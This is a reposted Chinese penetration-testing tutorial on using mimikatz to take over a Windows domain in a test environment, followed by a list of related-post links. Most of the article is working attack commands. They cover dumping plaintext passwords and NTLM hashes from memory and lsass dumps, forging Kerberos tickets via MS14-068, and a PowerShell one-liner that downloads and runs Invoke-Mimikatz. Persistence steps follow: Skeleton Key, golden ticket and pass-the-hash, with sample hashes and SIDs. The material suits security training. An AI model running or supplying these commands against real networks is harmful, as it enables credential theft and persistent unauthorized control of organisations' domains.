内网渗透中的mimikatz
来源:互联网 发布:修改手机mac软件 编辑:程序博客网 时间:2024/06/06 07:11
原文:
http://drops.wooyun.org/tips/7547
0x00 前言
上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz
0x01 简介
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
0x02 测试环境
网络资源管理模式:
域已有资源:
域内一台主机权限操作系统:win7 x64域权限:普通用户0x03 测试目标
1、获得域控权限 2、导出所有用户口令 3、维持域控权限
0x04 测试过程
1、获取本机信息
mimikatz:
privilege::debugsekurlsa::logonpasswords获取本机用户名、口令、sid、LM hash、NTLM hash 如图 
2、攻击域控,获得权限
使用ms14-068漏洞
ms14-068.exe -u -p -s -d 生成伪造缓存test.ccache:
如图 
导入伪造缓存:mimikatz:
kerberos::ptc test.ccache登陆:
net use \\A-635ECAEE64804.TEST.LOCALdir \\A-635ECAEE64804.TEST.LOCAL\c$获得域控权限,如图 
3、导出域控信息
(1)直接获取内存口令 mimikatz:
privilege::debugsekurlsa::logonpasswords(2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full(3)通过powershell加载mimikatz获取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz(4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv4、维持域控权限
(1)Skeleton Key mimikatz:
privilege::debugmisc::skeleton万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test如图 
(2)golden ticket mimikatz:
lsadump::lsa /patch获取krbtgt的ntlmhash,如图 
生成万能票据: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi导入票据: mimikatz:
kerberos::ptt test.kirbi登陆域控:
net use \\A-635ECAEE64804.TEST.LOCALdir \\A-635ECAEE64804.TEST.LOCAL\c$如图 
Tips:
Golden Ticket不多说,自行理解By default, the Golden Ticket default lifetime is 10 yearspassword changing/smartcard usage does not invalidate Golden Ticket;this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;NTLM hash of krbtgt account is never changed automatically.(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a如图 
5、补充
登陆域控,刷新扫雷记录,留下名字;D mimikatz:
minesweeper::infos如图 
0x05 小结
本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。
本文由三好学生原创并首发于乌云drops,转载请注明,谢谢神器在手,会用才行;) 水平有限,欢迎补充。
0 0
- 内网渗透中的mimikatz
- 内网渗透中的mimikatz
- 内网渗透中的mimikatz
- 内网渗透中mimikatz的使用
- 实战内网渗透
- 内网渗透
- 内网渗透方法
- 内网渗透例程
- 内网渗透常用命令
- 内网渗透杂记
- 内网渗透案例
- 浅谈内网渗透
- 浅谈内网渗透
- 内网渗透思路
- 浅谈内网渗透
- 内网渗透案例
- 内网渗透案例
- 内网渗透随想
- VPN连接设置
- 归并排序 java实现
- ViewPagerIndictor
- 抽象和封装:
- Shell入门(一)Shell脚本、环境
- 内网渗透中的mimikatz
- 死锁的相关概念
- 字符设备驱动模型
- QT之GUI学习笔记---文本文件读写
- 教你如何评估时间空间复杂度?
- IntelliJ如何设置类头注释和方法注释
- poj 2387 Til the Cows Come Home (最短路)
- exec
- Java01-"Hello World!"
